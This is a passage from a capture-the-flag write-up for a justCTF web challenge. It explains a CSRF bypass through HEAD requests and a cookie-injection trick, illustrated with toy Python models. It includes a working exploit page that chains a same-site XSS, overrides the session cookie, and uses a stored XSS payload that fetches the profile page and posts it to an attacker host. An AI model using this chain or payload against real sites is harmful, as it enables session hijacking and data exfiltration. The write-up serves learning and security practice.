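The main difference is that it uses a bare else when checking the method, unlike the other handlers, which use } else if r.Method == http.MethodPost {. Reading csrf.go also shows that the GET, HEAD, OPTIONS, and TRACE methods are not checked for a CSRF token, so sending one of these methods together with a body modifies the profile; I confirmed this with curl.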
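The interaction between the two checks can be modeled in a few lines. This is a toy model, not the actual Go code or the CSRF library: csrf_middleware, profile_edit, and handle are hypothetical names, and the only behavior assumed is what is described above (safe methods skip the token check, and the handler treats everything that is not GET as an update).

```python
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def csrf_middleware(method, token_valid):
    """Toy model: safe methods are allowed through without a token."""
    return method in SAFE_METHODS or token_valid


def profile_edit(method, form, profile):
    """Toy model of the handler: GET renders the form, anything else updates."""
    if method == "GET":
        return "render edit form"
    # Bare else branch: HEAD, OPTIONS and TRACE land here as well as POST.
    profile["description"] = form.get("description", "")
    return "profile updated"


def handle(method, form, profile, token_valid=False):
    if not csrf_middleware(method, token_valid):
        return "403 CSRF token invalid"
    return profile_edit(method, form, profile)


if __name__ == "__main__":
    victim = {"description": "original"}
    print(handle("POST", {"description": "xss"}, victim), victim)
    print(handle("HEAD", {"description": "xss"}, victim), victim)
```

A cross-site POST without a token is rejected, while a HEAD request carrying the same form values passes the middleware and still reaches the update branch.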
However, I could not find a way to make fetch or a form send a GET or HEAD request with a body, so I gave up on this route.
Instead I used the fact that http://xssl.web.jctf.pro and https://phantom.web.jctf.pro are same-site, so I can set cookies from xssl.web.jctf.pro.
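However, document.cookie = 'session=... ;path=/profile; domain=web.jctf.pro' did not work for some unknown reason; my guess is that the original cookie is Secure or HttpOnly, so the browser refuses to overwrite it. Luckily I had recently read the article Cookie Bugs - Smuggling & Injection, which taught me that document.cookie = '=a=b' creates a cookie with (key, value) = ('', 'a=b') in the browser, and when it is serialized into the Cookie header it becomes Cookie: a=b (note that the equals sign between key and value is gone). Go's cookie parsing algorithm sees this as a cookie with (key, value) = ('a', 'b'), so this method successfully overrides the session cookie.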
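The mismatch between the two views of the cookie can be sketched as a toy model. Both functions below are hypothetical simplifications: browser_serialize mimics only the behavior described in the article (a nameless cookie is sent as its bare value), and server_parse is a generic split on the first equals sign rather than Go's actual parser.

```python
def browser_serialize(name, value):
    """Toy model of the browser side: a cookie with an empty name is sent as its bare value."""
    return value if name == "" else f"{name}={value}"


def server_parse(header):
    """Toy model of the server side: split each pair on the first '='."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        key, _, value = part.partition("=")
        cookies[key] = value
    return cookies


if __name__ == "__main__":
    # document.cookie = '=session=ATTACKER' is stored as ('', 'session=ATTACKER')
    header = browser_serialize("", "session=ATTACKER")
    print(header)
    print(server_parse(header))
```

The browser treats the injected cookie as a different (nameless) cookie, so it does not collide with the protected session cookie, yet the server reads it back as one named session.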
<script>
const samesiteXSS =
'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'
// prepare an account with the following xss payload as description
// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
// playing with window/iframe references should work too
window.name =
'javascript:' +
encodeURIComponent(`
document.cookie = '=session=MTY4NTg2ODU0OXxEdi1CQkFFQ180SUFBUkFCRUFBQVRQLUNBQUlHYzNSeWFXNW5EQThBRFdGMWRHaGxiblJwWTJGMFpXUUVZbTl2YkFJQ0FBRUdjM1J5YVc1bkRBb0FDSFZ6WlhKdVlXMWxCbk4wY21sdVp3d0xBQWx6ZFhCbGNtNWxibVU9fNgFpBvKntkK07FH7_Zcu0zSesy10P01b20weA_MIt_p;domain=web.jctf.pro;path=/profile'
location = 'https://phantom.web.jctf.pro/profile'
`)
location = samesiteXSS
// justCTF{why_on_earth_does_my_app_handle_HEADs}
</script>
I also learned after the CTF that r.FormValue(key) reads from the query string too, so the CSRF could have been done simply with HEAD /profile/edit?name=&description=XSS.